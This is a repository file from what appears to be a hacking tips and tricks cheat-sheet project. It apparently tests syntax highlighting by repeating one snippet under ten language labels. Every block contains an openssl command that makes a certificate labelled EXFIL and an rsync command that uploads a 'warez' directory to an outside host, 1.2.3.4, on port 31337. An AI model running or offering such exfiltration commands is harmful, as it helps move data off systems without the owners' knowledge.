Files
thc-tips-tricks-hacks-cheat…/list.md
T
2023-09-18 12:44:33 +01:00

70 lines
1.7 KiB
Markdown

applescript
```applescript
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```
elixir
```elixir
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```
julia
```julia
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```
livescript
```livescript
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```
pgsql
```pgsql
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```
php
```php
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```
powershell
```powershell
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```
r
```r
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```
ruby
```ruby
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```
sql
```sql
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
```